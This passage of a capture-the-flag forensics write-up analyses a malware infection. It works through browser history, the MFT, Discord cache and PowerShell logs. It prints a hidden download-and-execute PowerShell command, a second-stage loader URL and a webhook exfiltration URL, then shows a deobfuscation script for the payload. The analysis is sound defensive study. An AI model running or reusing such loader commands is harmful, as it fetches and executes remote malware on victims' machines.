44|34|https://www.gameslearningsociety.org/how-to-mod-cracked-risk-of-rain-2/?__cf_chl_tk=kFUTFNnUd6sRNgb.wvf1dtAm7YE5PhiSQdlhkFIE46w-1752025823-1.0.1.1-qrezcqD3Mfk9iWhw2ZgcZQr3rGKbUlpT8FDri7pWs0M|https://www.gameslearningsociety.org/|1
45|46|https://www.bing.com/search?q=win-rar&cvid=5bb8ddd8b85f46619d4b499965b25749&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOTIGCAEQLhhAMgYIAhAAGEAyBggDEC4YQDIGCAQQLhhAMgYIBRAAGEAyBggGEC4YQDIGCAcQLhhAMgYICBAAGEDSAQg2NDQ4ajBqNKgCCLACAQ&FORM=ANAB01&PC=U531|https://www.bing.com/|1
46|45|https://www.bing.com/ck/a?!&&p=d9f980cedebfd333cce39e03a35278abff4d9d4555baef1db71f9bfdf627bd71JmltdHM9MTc1MTkzMjgwMA&ptn=3&ver=2&hsh=4&fclid=10fb4f82-e80e-6c96-23ea-59a1e94b6d0e&psq=win-rar&u=a1aHR0cHM6Ly93d3cud2luLXJhci5jb20v&ntb=1|https://www.bing.com/|1
47|47|https://www.bing.com/search?q=win-rar&cvid=5bb8ddd8b85f46619d4b499965b25749&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOTIGCAEQLhhAMgYIAhAAGEAyBggDEC4YQDIGCAQQLhhAMgYIBRAAGEAyBggGEC4YQDIGCAcQLhhAMgYICBAAGEDSAQg2NDQ4ajBqNKgCCLACAQ&FORM=ANAB01&PC=U531|https://www.bing.com/|1
48|48|https://www.bing.com/search?q=win-rar&cvid=5bb8ddd8b85f46619d4b499965b25749&gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOTIGCAEQLhhAMgYIAhAAGEAyBggDEC4YQDIGCAQQLhhAMgYIBRAAGEAyBggGEC4YQDIGCAcQLhhAMgYICBAAGEDSAQg2NDQ4ajBqNKgCCLACAQ&FORM=ANAB01&PC=U531|https://www.bing.com/|1
49|49|https://www.win-rar.com/start.html?&L=0|https://www.win-rar.com/|1
50|50|https://www.win-rar.com/predownload.html?&L=0|https://www.win-rar.com/|1
51|52|https://drive.google.com/file/d/1ZK-MED8DZcgsITflYMvWwAzYIlOFS7zu/view?usp=sharing|https://drive.google.com/|1
52|53|https://drive.google.com/file/d/1ZK-MED8DZcgsITflYMvWwAzYIlOFS7zu/view|https://drive.google.com/|1
53|54|https://drive.google.com/file/d/1ZK-MED8DZcgsITflYMvWwAzYIlOFS7zu/view|https://drive.google.com/|1And we can se the google drive link was visited by the victim. https://drive.google.com/file/d/1ZK-MED8DZcgsITflYMvWwAzYIlOFS7zu/view?usp=sharing.
9. After the victim downloads and unzips the file, the malware file is moved to what folder?
Use the History file, there is a downloads tables that locate the downloaded file in the computer
sqlite> SELECT * FROM downloads;
1|7d647912-9f36-4aca-8e4c-ce431d8b6911|C:\Users\Peacock\Downloads\DiscordSetup.exe|C:\Users\Peacock\Downloads\DiscordSetup.exe|13396466260596779|120263544|120263544|1|4|0||13396466302714504|1|13396466538393314|0|https://discord.com/|||https://discord.com/download|https://www.bing.com/|||||"f8738cd99437a9cd1ad281233b19349b"|Mon, 30 Jun 2025 17:50:49 GMT|application/x-msdownload|application/x-msdownload
2|5be26c9d-d259-467c-82e9-c3e94383c01d|C:\Users\Peacock\Downloads\SteamSetup.exe|C:\Users\Peacock\Downloads\SteamSetup.exe|13396466833558737|2380800|2380800|1|4|0||13396466836387047|1|13396466837083699|0|https://store.steampowered.com/|||https://store.steampowered.com/about/download|https://www.bing.com/|||||"664bcd75-245400"|Mon, 20 May 2024 22:23:49 GMT|application/x-msdownload|application/octet-stream
3|c12d68b9-d6bd-43c0-8172-2919332b16ee|C:\Users\Peacock\Downloads\5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.jpg|C:\Users\Peacock\Downloads\5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.jpg|13396466914887698|845814|845814|1|0|0||13396466915520513|1|13396466916307601|0|https://rare-gallery.com/5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.html|||https://rare-gallery.com/5478063-yuru-camp-rin-shima-nadeshiko-kagamihara-anime-girls.html|https://www.bing.com/|||||"65024888-ce7f6"|Wed, 13 Sep 2023 23:40:56 GMT|image/jpeg|image/jpeg
4|ed8bbf87-0a60-4f81-bbf5-e013984c21d0|C:\Users\Peacock\Downloads\winrar-x64-712.exe|C:\Users\Peacock\Downloads\winrar-x64-712.exe|13396499710664488|3791016|3791016|1|4|0||13396499714723598|1|13396499716416646|0|https://www.win-rar.com/postdownload.html?&L=0|||https://www.win-rar.com/postdownload.html?&L=0|https://www.win-rar.com/predownload.html?&L=0|||||"39d8a8-63860aafbad77"|Wed, 25 Jun 2025 07:48:16 GMT|application/x-msdownload|application/octet-stream
5|3bc18810-63d7-400d-89cd-32e24dc3fa3e|C:\Users\Peacock\Downloads\main.rar|C:\Users\Peacock\Downloads\main.rar|13396499737739807|10961284|10961284|1|4|0||13396499748553171|1|13396499754952853|0||||https://drive.usercontent.google.com/download?id=1ZK-MED8DZcgsITflYMvWwAzYIlOFS7zu&export=download|https://drive.google.com/||||||Tue, 08 Jul 2025 11:25:40 GMT|application/octet-stream|application/octet-streamthe folder after the victim unzip the file. So we can use the $MFT we have. The NTFS file system contains a file called the master file table, or MFT. There is at least one entry in the MFT for every file on an NTFS file system volume, including the MFT itself. All information about a file, including its size, time and date stamps, permissions, and data content, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries.
We can use https://github.com/omerbenamram/mft to parse the $MFT file to readable format like csv or json. Also we know the timestamp for the end time the file successfuly downloaded at History db before, 2025–07–09 01:55:48.553171 . So we can trace it in the MFT. But, there is take too much time, and when I go back to the Users/Peacock/Documents there is a file main.exe, suggested that that’s the unzipped file victim’s already download. To confirm that is the unzipped file, we can download and unzip it then compare the sha256sum.
But… the file is encrypted and I cant extract it, I need a password. Basically, I just found how to extract or see the discord message in the Cache, Users/Peacock/AppData/Roaming/discord/Cache/Cache_Data , We can refer to this blog https://medium.com/@chaoskist/letsdefend-write-up-discord-forensics-6ac3466fd3fe. But the tools they used is designed only for Windows environment.
After dig dive into the internet, I found the MacOS tools to extract the chrome cache data use https://echoone.com/filejuicer/. So we can extract the Cache and got the message log!
[
// rest of the message
{
"type": 0,
"content": "||FreeGamesBro||",
"mentions": [],
"mention_roles": [],
"attachments": [],
"embeds": [],
"timestamp": "2025-07-09T01:58:06.850000+00:00",
"edited_timestamp": null,
"flags": 0,
"components": [],
"id": "1392323904038506569",
"channel_id": "1392096559826731158",
"author": {
"id": "1391972617149481050",
"username": "f16yum",
"avatar": "9614bb4b6e68e613804937c4567074b4",
"discriminator": "0",
"public_flags": 0,
"flags": 0,
"banner": null,
"accent_color": null,
"global_name": "Coolllllll",
"avatar_decoration_data": null,
"collectibles": null,
"banner_color": null,
"clan": null,
"primary_guild": null
},
"pinned": false,
"mention_everyone": false,
"tts": false
},
{
"type": 0,
"content": "Oh.. wait",
"mentions": [],
"mention_roles": [],
"attachments": [],
"embeds": [],
"timestamp": "2025-07-09T01:57:52.541000+00:00",
"edited_timestamp": null,
"flags": 0,
"components": [],
"id": "1392323844022472857",
"channel_id": "1392096559826731158",
"author": {
"id": "1391972617149481050",
"username": "f16yum",
"avatar": "9614bb4b6e68e613804937c4567074b4",
"discriminator": "0",
"public_flags": 0,
"flags": 0,
"banner": null,
"accent_color": null,
"global_name": "Coolllllll",
"avatar_decoration_data": null,
"collectibles": null,
"banner_color": null,
"clan": null,
"primary_guild": null
},
"pinned": false,
"mention_everyone": false,
"tts": false
},
{
"type": 0,
"content": "what is the password?",
"mentions": [],
"mention_roles": [],
"attachments": [],
"embeds": [],
"timestamp": "2025-07-09T01:57:38.627000+00:00",
"edited_timestamp": null,
"flags": 0,
"components": [],
"id": "1392323785662926860",
"channel_id": "1392096559826731158",
"author": {
"id": "1391969554309058590",
"username": "peacock1337",
"avatar": "2980ae3fb2caa8759ec385a5f0893742",
"discriminator": "0",
"public_flags": 0,
"flags": 0,
"banner": null,
"accent_color": null,
"global_name": "alwaysgemink",
"avatar_decoration_data": null,
"collectibles": null,
"banner_color": null,
"clan": null,
"primary_guild": null
},
"pinned": false,
"mention_everyone": false,
"tts": false
}
// rest of the message
]So, we know that the password is FreeGamesBro. Then we can unzip the downloaded file and compare it to the file in artifact.
So it confirm that the path after victim unzipped the file is C:\Users\Peacock\Documents\main.exe.
10. What is the URL accessed by the initial dropper to download the second-stage loader?
After we know the first loader, we can use sandboxed platform to analyze. In this challenge, Im using any.run.
So, based on the report, the URL accessed is http://143.198.88.30:1338/installer.exe.
11. Where was the second-stage loader stored after being downloaded?
So, based on the report, the first exe run a powershell script and drop the second stage. But when i submit the name for the exe, its wrong. So, we can check the events log files. We can get it in the Windows/System32/winevt/Logs and use https://github.com/omerbenamram/evtx to dump all the event log file and convert it to xml. After that, we can go to the Windows PowerShell.xml
Record 19
<?xml version="1.0" encoding="utf-8"?>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell">
</Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2025-07-09T02:00:50.679050Z">
</TimeCreated>
<EventRecordID>19</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID="0" ThreadID="0">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-BE5EM7B</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>Registry,Started, ProviderName=Registry
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=60a51af8-95f9-409f-bcfa-bc27395ba6a1
HostApplication=powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://143.198.88.30:1338/o.ps1')
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
<Binary></Binary>
</EventData>
</Event>Found that record and the timestamp, we can go back to our MFT and search around that timestamp.
FILE
115514
3
0
0
1
ALLOCATED
352
1024
3169280
FALSE
FALSE
FALSE
FILE_ATTRIBUTE_ARCHIVE
2025-07-09T02:00:47.948398Z
2025-07-09T02:00:47.948398Z
2025-07-09T02:00:40.594797Z
FILE_ATTRIBUTE_ARCHIVE
2025-07-09T02:00:40.594797Z
2025-07-09T02:00:40.594797Z
2025-07-09T02:00:40.594797Z
Windows/Temp/MkbrkEXh.exe
Found the name, so the answer will be C:\Windows\Temp\MkbrkEXh.exe
12. What repository does the threat actor use to develop the second-stage
First, we can open the second stage file in the binary ninja.
Im pretty sure that's golang binary. And i notice that's shellcode in golang
rax_8, rcx_9, zmm1_6, zmm15_2 = main.shellcodeToUUID(rcx_3, zmm1_2, rax_5, 0x2f6, arg3)So I can use my osint to found the go shellcode and found it in the first spot.
Therefore the answer is https://github.com/Ne0nd0g/go-shellcode.
13. What is the full PowerShell command executed by the second-stage loader?
Based on the Powershell log we have, the command executed is powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://143.198.88.30:1338/o.ps1').
14. What URL does the final payload send the encrypted file to after encryption?
We can use sandboxed platform like tria.ge to analyze that. First we need to download the o.ps1 and then we can upload it on the triage.
Then we know that the final payload communicate with https://webhook.site/5bdcd260-64f9-47d9-9fb5-1ef8146dc402.
15. What key was used by the final payload to encrypt the Downloads folder?
So we can analyze the ps1 script. Its heavly obfuscated (thanks daffainfo). So I'm racking my brain to deobfuscate that. So, the main payload is obfuscated with character mapping according to the given array, and the array is also obfuscated per character. Therefore, we must obtain the value of each array and apply it to the payload. Here, I changed the name of each variable to a-u to make mapping easier.
import re
def parse_char_expressions(text):
pattern = r'\[char\]\((.*?)\)'
matches = re.findall(pattern, text)
if not matches:
print("No [char] expressions found!")
return None
chars = []
values = []
for i, expr in enumerate(matches):
try:
expr = expr.strip()
value = eval(expr)
values.append(value)
char = chr(value)
chars.append(char)
print(f"{i+1:3d}: {expr:30s} = {value:3d} = '{char}'")
except Exception as e:
print(f"Error processing expression {i+1}: {expr} - {e}")
chars.append('?')
values.append(0)
print(f"Character values: {values}")
return {
'values': values,
}
a = """
[char](- 86 - 65 + 11 + 41 - 20 + 176),[char](35 - 95 + 95 + 60 - 33 + 50),[char](- 84 + 17 - 49 + 69 + 19 + 104),[char](95 + 35 - 90 - 43 + 77 - 38),[char](73 - 86 - 69 + 13 + 56 + 79),[char](92 + 39 + 32 + 98 + 16 - 238),[char](89 - 85 - 48 - 17 - 26 + 171),[char](- 51 + 35 - 80 + 70 + 71 - 13),[char](12 - 89 - 80 + 87 + 88 + 92),[char](- 49 + 44 + 98 - 56 + 25 + 24),[char](- 31 + 61 + 49 + 15 - 53 + 12),[char](36 - 89 - 26 - 56 + 81 + 144),[char](- 61 + 43 + 58 + 80 + 40 - 69),[char](- 18 + 47 - 19 + 61 + 21 + 16),[char](22 - 96 + 16 - 49 - 16 + 241),[char](44 + 23 - 31 - 70 - 41 + 109),[char](28 + 97 - 83 + 89 - 96),[char](34 - 18 - 27 + 63 - 73 + 135),[char](- 65 + 19 - 30 + 28 + 92 + 63),[char](- 40 + 62 - 89 + 29 - 19 + 172),[char](39 + 55 - 95 + 11 - 99 + 195),[char](- 60 - 31 + 98 + 68 - 56 + 43),[char](37 + 54 + 17 + 67 - 11 - 53),[char](36 + 11 + 67 + 90 + 56 - 177),[char](45 + 81 - 87 - 15 + 34 - 10),[char](11 + 60 - 71 + 70 + 94 - 59),[char](- 25 + 51 + 65 + 32 - 23),[char](66 - 13 - 72 - 33 + 51 + 110),[char](- 68 - 13 + 94 + 46 + 58 - 35),[char](39 + 16 - 85 + 69 - 54 + 82),[char](16 + 31 - 75 + 41 + 59 - 39),[char](76 - 19 + 48 + 75 + 31 - 86),[char](52 - 42 - 85 + 84 + 75 - 37),[char](55 - 60 - 74 - 85 - 59 + 260),[char](- 67 - 94 + 79 + 72 - 29 + 97),[char](66 + 48 + 44 + 96 - 18 - 132),[char](- 10 + 66 - 56 - 32 - 82 + 207),[char](- 16 - 66 + 62 - 94 - 96 + 307),[char](19 - 75 - 98 - 40 + 20 + 261),[char](- 63 - 35 - 21 + 48 + 72 + 45),[char](- 93 + 31 - 81 + 76 - 24 + 129),[char](- 85 + 74 + 69 - 92 + 95 + 16),[char](72 - 71 - 27 - 64 - 31 + 184),[char](87 + 34 - 45 + 72 + 88 - 191),[char](- 46 - 70 + 26 + 39 - 41 + 156),[char](- 65 + 17 - 10 + 98 + 43 - 23),[char](57 + 82 + 46 - 23 - 55 - 29),[char](34 - 62 - 76 - 25 - 28 + 256),[char](70 - 79 - 10 - 69 - 44 + 213),[char](84 + 73 - 35 + 45 - 19 - 79),[char](- 58 - 91 - 70 - 58 - 25 + 358),[char](- 95 + 32 + 41 + 75 - 88 + 123),[char](- 70 + 59 - 14 + 87 - 72 + 99),[char](- 62 + 38 + 85 - 55 + 31 + 58),[char](64 - 13 - 97 + 63 + 52 + 52),[char](- 99 - 89 + 28 + 33 - 13 + 149),[char](- 56 + 77 + 30 + 69 + 63 - 70),[char](- 39 + 35 + 53 - 69 - 90 + 229),[char](- 85 - 94 - 41 - 45 + 86 + 234),[char](- 28 + 92 - 74 + 31 + 51 - 23),[char](47 + 29 - 74 - 21 + 86 + 56),[char](- 66 - 28 - 53 - 91 + 46 + 244),[char](- 40 + 16 - 76 + 11 + 89 + 54),[char](15 + 22 + 82 - 10 + 41 - 33),[char](57 - 55 + 34 - 58 + 95 - 1),[char](40 - 48 - 27 + 33 + 82 - 29),[char](- 19 - 93 + 51 + 93 + 35 + 31),[char](- 63 - 10 - 27 + 38 + 77 + 25),[char](23 - 67 - 64 - 89 - 52 + 314),[char](75 + 75 + 47 + 76 + 98 - 330),[char](91 - 73 + 13 + 60 + 88 - 118),[char](67 - 91 + 23 + 59 - 20 + 42),[char](15 + 10 + 80 - 97 + 91 - 56),[char](66 + 29 - 79 + 20 + 39 - 5),[char](- 24 + 11 - 91 + 31 + 79 + 73),[char](51 - 70 + 36 + 47 + 79 - 27),[char](13 + 68 - 21 + 50 - 24 - 36),[char](42 + 10 - 14 - 90 - 29 + 182),[char](- 93 + 76 + 84 + 87 + 69 - 212),[char](32 + 14 + 98 - 76 + 98 - 156),[char](48 - 10 + 72 + 34 - 92 - 8),[char](18 - 93 - 40 - 33 - 80 + 324),[char](- 33 + 87 + 82 - 10 + 60 - 112),[char](59 - 81 + 29 - 80 + 90 + 109),[char](36 + 85 + 56 - 98 - 62 + 107),[char](75 - 21 + 79 - 86 + 28 - 63),[char](71 - 31 - 33 - 43 - 59 + 154),[char](21 + 13 - 23 - 18 - 51 + 131),[char](- 14 - 78 + 67 + 84 - 32 + 48),[char](- 52 + 60 - 76 - 61 + 54 + 143),[char](60 + 68 + 59 + 73 - 11 - 127),[char](- 11 + 56 - 25 + 84 - 37 + 36),[char](98 + 54 + 11 + 71 + 80 - 222),[char](- 39 + 17 - 99 - 37 - 21 + 273),[char](40 - 14 + 62 + 10 - 62 + 35),[char](30 + 94 + 37 - 47 - 28 + 34),[char](- 19 - 12 - 37 + 25 + 40 + 45),[char](- 95 + 94 - 40 + 67 - 96 + 155),[char](- 27 + 46 - 96 - 50 + 77 + 152),[char](13 - 63 - 69 - 17 - 20 + 169)
"""
if __name__ == "__main__":
result = parse_char_expressions(a)I repeat it from the a until u to get the full mapped character. Then deobfuscate the payload.
import re
def deobfuscate_payload():
a = [10, 86, 84, 98, 103, 125, 64, 62, 56, 109, 61, 111, 73, 55, 41, 32, 48, 52, 53, 112, 101, 105, 83, 49, 11, 74, 45, 77, 70, 37, 120, 118, 40, 35, 33, 115, 121, 107, 81, 47, 89, 72, 51, 54, 50, 117, 76, 78, 38, 97, 126, 91, 75, 94, 79, 58, 106, 100, 59, 93, 42, 39, 68, 65, 92, 80, 85, 87, 114, 13, 46, 110, 66, 99, 123, 67, 57, 36, 90, 71, 96, 63, 60, 124, 44, 82, 119, 95, 43, 122, 9, 113, 102, 69, 88, 108, 104, 34, 116, 12]
b = [12, 102, 69, 124, 100, 82, 105, 123, 63, 59, 97, 84, 65, 77, 79, 114, 66, 91, 92, 122, 60, 121, 39, 36, 111, 120, 89, 87, 81, 46, 10, 42, 75, 85, 13, 56, 37, 74, 126, 33, 71, 94, 73, 108, 96, 95, 117, 107, 104, 101, 47, 103, 51, 99, 113, 83, 61, 53, 45, 64, 32, 116, 78, 40, 54, 67, 58, 52, 93, 88, 41, 62, 11, 70, 80, 90, 55, 112, 115, 34, 86, 106, 57, 38, 50, 35, 44, 9, 49, 98, 118, 43, 68, 125, 76, 110, 109, 72, 48, 119]
c = [80, 120, 51, 12, 118, 106, 49, 83, 39, 110, 77, 79, 91, 58, 94, 66, 93, 47, 123, 116, 59, 119, 67, 85, 52, 92, 33, 88, 98, 75, 109, 73, 40, 126, 36, 38, 34, 81, 97, 117, 102, 74, 90, 89, 71, 121, 82, 125, 13, 42, 9, 100, 78, 64, 11, 60, 124, 86, 96, 87, 68, 55, 56, 61, 76, 115, 65, 112, 45, 57, 35, 104, 10, 84, 103, 113, 111, 50, 70, 43, 105, 63, 99, 114, 62, 41, 54, 46, 72, 107, 122, 37, 53, 108, 101, 48, 44, 95, 32, 69]
d = [124, 78, 122, 105, 40, 13, 107, 59, 100, 36, 73, 97, 54, 119, 45, 81, 71, 70, 91, 89, 118, 92, 61, 51, 62, 126, 90, 79, 115, 64, 74, 67, 46, 114, 98, 82, 83, 112, 80, 87, 123, 108, 66, 44, 94, 57, 88, 93, 77, 72, 95, 35, 110, 120, 60, 58, 43, 102, 65, 42, 39, 125, 11, 76, 86, 32, 84, 85, 96, 106, 116, 99, 53, 52, 38, 63, 48, 37, 33, 103, 34, 41, 12, 55, 49, 68, 50, 104, 69, 111, 10, 113, 56, 121, 75, 109, 117, 101, 9, 47]
e = [99, 73, 92, 52, 45, 40, 62, 77, 88, 80, 32, 70, 83, 86, 38, 36, 90, 123, 51, 112, 125, 78, 42, 105, 12, 118, 111, 10, 35, 67, 84, 69, 11, 64, 119, 13, 91, 60, 93, 95, 98, 63, 68, 124, 55, 76, 65, 37, 66, 56, 39, 33, 94, 107, 44, 103, 121, 100, 115, 113, 43, 89, 81, 54, 49, 108, 104, 114, 96, 120, 110, 53, 126, 50, 47, 74, 102, 116, 41, 79, 71, 58, 57, 109, 75, 48, 97, 101, 106, 61, 87, 72, 117, 59, 85, 122, 82, 46, 34, 9]
f = [40, 60, 13, 88, 37, 92, 93, 107, 41, 99, 58, 55, 57, 118, 109, 125, 36, 87, 94, 43, 49, 64, 35, 78, 120, 69, 33, 104, 117, 80, 105, 52, 50, 56, 32, 65, 70, 39, 100, 115, 86, 59, 79, 90, 112, 114, 66, 110, 72, 83, 108, 12, 47, 96, 126, 102, 98, 38, 75, 81, 89, 48, 77, 106, 62, 76, 45, 54, 97, 121, 95, 71, 61, 103, 68, 122, 111, 91, 73, 116, 11, 124, 10, 119, 74, 9, 82, 63, 53, 85, 34, 44, 84, 67, 46, 113, 123, 51, 101, 42]
g = [125, 115, 87, 32, 93, 94, 48, 12, 86, 107, 91, 73, 84, 105, 59, 119, 11, 67, 38, 101, 56, 126, 108, 114, 83, 88, 50, 62, 9, 35, 53, 61, 44, 55, 124, 99, 65, 92, 13, 122, 36, 58, 118, 123, 85, 77, 98, 75, 43, 113, 109, 100, 120, 45, 102, 60, 82, 69, 96, 110, 71, 112, 41, 89, 106, 66, 57, 72, 111, 104, 64, 54, 97, 81, 80, 70, 63, 39, 79, 116, 47, 10, 90, 40, 95, 103, 68, 51, 34, 76, 78, 121, 42, 52, 74, 37, 46, 117, 49, 33]
h = [63, 84, 125, 67, 86, 110, 62, 70, 113, 93, 13, 36, 44, 43, 41, 33, 85, 56, 57, 50, 79, 9, 48, 68, 69, 91, 115, 49, 121, 74, 46, 61, 124, 126, 101, 12, 96, 117, 95, 59, 55, 106, 105, 10, 81, 109, 100, 118, 64, 42, 87, 77, 78, 102, 108, 66, 122, 120, 45, 103, 94, 32, 92, 35, 83, 40, 51, 76, 98, 34, 88, 97, 38, 114, 82, 54, 90, 47, 116, 112, 52, 107, 104, 65, 72, 119, 123, 53, 89, 58, 37, 73, 11, 99, 60, 80, 71, 39, 111, 75]
i = [52, 77, 114, 56, 59, 126, 73, 84, 46, 34, 74, 63, 38, 47, 65, 88, 81, 50, 13, 49, 70, 61, 75, 68, 118, 54, 44, 62, 112, 42, 82, 85, 33, 35, 69, 60, 36, 91, 72, 115, 124, 12, 102, 123, 106, 92, 71, 43, 120, 87, 122, 76, 98, 119, 11, 45, 109, 40, 105, 41, 97, 51, 67, 104, 57, 99, 32, 125, 83, 94, 86, 10, 48, 89, 113, 101, 90, 96, 55, 121, 116, 100, 66, 110, 117, 53, 58, 107, 95, 79, 64, 9, 103, 39, 93, 78, 108, 37, 111, 80]
j = [115, 108, 83, 101, 122, 68, 85, 95, 36, 56, 70, 114, 113, 40, 102, 42, 52, 57, 12, 90, 43, 69, 123, 78, 62, 65, 11, 120, 41, 55, 77, 88, 99, 118, 59, 51, 92, 34, 109, 75, 93, 46, 112, 111, 91, 87, 104, 107, 49, 61, 116, 126, 47, 33, 37, 105, 84, 96, 100, 50, 66, 110, 89, 119, 48, 124, 54, 76, 13, 97, 64, 71, 73, 79, 63, 9, 106, 67, 86, 58, 72, 38, 32, 82, 80, 53, 98, 94, 39, 81, 125, 121, 74, 60, 10, 35, 103, 45, 44, 117]
k = [78, 45, 74, 58, 110, 41, 11, 104, 91, 123, 66, 55, 48, 65, 106, 70, 47, 114, 60, 10, 64, 124, 120, 103, 36, 82, 35, 42, 56, 83, 81, 121, 125, 87, 77, 61, 71, 112, 118, 52, 99, 122, 126, 100, 101, 37, 69, 88, 13, 44, 98, 105, 38, 115, 46, 9, 107, 57, 32, 72, 108, 68, 49, 67, 76, 85, 93, 33, 53, 50, 116, 73, 51, 89, 62, 111, 63, 80, 75, 54, 90, 96, 40, 79, 94, 12, 117, 39, 113, 43, 102, 59, 119, 86, 92, 95, 109, 84, 97, 34]
l = [37, 112, 12, 58, 87, 70, 13, 105, 100, 86, 32, 36, 118, 35, 45, 39, 56, 95, 43, 52, 89, 51, 103, 67, 38, 88, 107, 44, 61, 40, 111, 41, 109, 91, 77, 125, 108, 113, 73, 96, 110, 93, 83, 99, 34, 92, 117, 46, 114, 94, 79, 76, 54, 106, 71, 50, 62, 80, 68, 33, 115, 64, 47, 55, 65, 98, 59, 123, 66, 102, 48, 122, 69, 10, 119, 120, 72, 84, 104, 82, 85, 63, 121, 124, 42, 101, 57, 49, 60, 81, 9, 97, 116, 90, 53, 74, 126, 75, 11, 78]
m = [71, 53, 67, 69, 106, 9, 118, 120, 99, 43, 91, 37, 101, 73, 115, 93, 126, 108, 49, 102, 122, 45, 80, 58, 70, 39, 41, 68, 119, 55, 47, 57, 44, 100, 79, 12, 51, 86, 75, 34, 109, 62, 10, 77, 33, 60, 83, 124, 84, 40, 107, 121, 52, 114, 59, 98, 61, 125, 64, 82, 36, 78, 32, 123, 110, 54, 97, 13, 50, 92, 111, 81, 103, 90, 96, 116, 38, 46, 113, 104, 87, 112, 66, 65, 89, 85, 94, 72, 63, 95, 74, 35, 42, 56, 48, 76, 88, 11, 105, 117]
n = [69, 36, 102, 116, 74, 72, 105, 125, 81, 64, 68, 90, 91, 55, 70, 73, 114, 57, 63, 115, 76, 32, 93, 109, 61, 12, 99, 113, 101, 46, 124, 35, 71, 87, 106, 41, 75, 112, 104, 79, 43, 60, 54, 88, 56, 42, 66, 62, 89, 108, 83, 11, 78, 86, 95, 94, 38, 119, 39, 126, 47, 65, 121, 53, 49, 44, 45, 59, 110, 40, 33, 85, 103, 80, 51, 120, 122, 117, 52, 84, 82, 58, 107, 97, 13, 10, 34, 98, 77, 67, 50, 96, 37, 100, 92, 118, 48, 123, 9, 111]
o = [123, 108, 94, 60, 101, 124, 44, 41, 69, 40, 125, 61, 10, 47, 49, 118, 53, 79, 36, 67, 64, 9, 11, 82, 109, 91, 103, 98, 56, 114, 102, 84, 32, 106, 92, 81, 88, 105, 70, 58, 87, 122, 46, 112, 110, 75, 71, 38, 50, 90, 55, 78, 104, 37, 33, 57, 83, 77, 63, 111, 72, 119, 68, 66, 48, 99, 121, 116, 54, 89, 85, 80, 45, 12, 42, 126, 35, 65, 107, 113, 43, 13, 97, 95, 117, 100, 120, 86, 76, 73, 59, 115, 51, 96, 52, 62, 93, 74, 34, 39]
p = [41, 52, 64, 46, 66, 119, 36, 118, 97, 32, 45, 87, 74, 35, 117, 110, 111, 93, 103, 116, 114, 86, 94, 115, 9, 65, 92, 95, 42, 67, 75, 88, 55, 83, 125, 40, 34, 98, 122, 91, 102, 56, 96, 73, 126, 72, 108, 113, 13, 53, 50, 54, 85, 58, 82, 47, 37, 51, 33, 104, 105, 77, 112, 44, 100, 124, 123, 79, 61, 99, 39, 121, 69, 11, 70, 48, 62, 106, 101, 57, 38, 59, 107, 120, 71, 76, 60, 63, 49, 84, 81, 89, 68, 90, 43, 10, 12, 109, 80, 78]
q = [117, 110, 59, 96, 38, 115, 120, 11, 113, 94, 81, 114, 87, 122, 102, 37, 70, 111, 90, 9, 40, 33, 35, 95, 55, 78, 42, 119, 50, 86, 12, 100, 44, 103, 82, 10, 105, 116, 79, 68, 104, 121, 125, 107, 101, 89, 99, 73, 58, 74, 124, 46, 57, 34, 108, 13, 63, 54, 85, 77, 76, 123, 75, 61, 53, 84, 64, 39, 118, 83, 109, 72, 41, 92, 65, 62, 93, 51, 126, 45, 49, 69, 60, 52, 88, 97, 56, 112, 67, 106, 43, 47, 66, 71, 91, 32, 98, 80]
r = [119, 71, 88, 100, 58, 47, 120, 95, 59, 109, 32, 54, 52, 12, 75, 80, 81, 112, 67, 103, 50, 57, 66, 37, 73, 121, 42, 74, 36, 84, 82, 105, 46, 11, 113, 43, 63, 40, 86, 79, 72, 122, 41, 114, 77, 93, 115, 94, 89, 61, 55, 45, 34, 51, 44, 60, 111, 9, 13, 108, 53, 96, 38, 102, 110, 90, 78, 98, 106, 97, 124, 35, 33, 39, 117, 48, 104, 62, 69, 107, 10, 118, 56, 76, 92, 116, 126, 83, 70, 99, 101, 64, 65, 85, 68, 87, 49, 123, 91, 125]
t = [117, 88, 75, 72, 113, 42, 101, 36, 84, 63, 55, 118, 91, 93, 114, 56, 38, 125, 109, 108, 81, 99, 46, 49, 32, 62, 74, 60, 110, 122, 71, 103, 102, 119, 50, 77, 121, 100, 69, 90, 12, 78, 44, 58, 123, 111, 86, 126, 124, 120, 73, 115, 9, 48, 52, 92, 37, 112, 57, 65, 54, 89, 51, 41, 116, 35, 82, 104, 87, 96, 13, 68, 106, 53, 34, 79, 95, 33, 67, 39, 11, 85, 94, 105, 47, 66, 80, 83, 107, 61, 45, 10, 70, 64, 43, 98, 97, 40, 59, 76]
u = [57, 112, 76, 36, 66, 39, 84, 32, 110, 86, 53, 90, 91, 108, 118, 34, 35, 114, 107, 115, 106, 62, 111, 83, 48, 105, 100, 109, 82, 67, 33, 125, 47, 37, 58, 104, 93, 97, 87, 46, 38, 77, 63, 45, 64, 60, 78, 99, 81, 69, 56, 88, 89, 95, 121, 9, 113, 119, 55, 49, 123, 52, 54, 117, 72, 51, 98, 40, 65, 41, 61, 80, 43, 70, 79, 116, 50, 101, 11, 10, 44, 96, 74, 126, 124, 12, 59, 73, 75, 68, 122, 103, 92, 94, 71, 120, 42, 85, 102, 13]
data_map = {
'a': a, 'b': b, 'c': c, 'd': d, 'e': e, 'f': f, 'g': g, 'h': h,
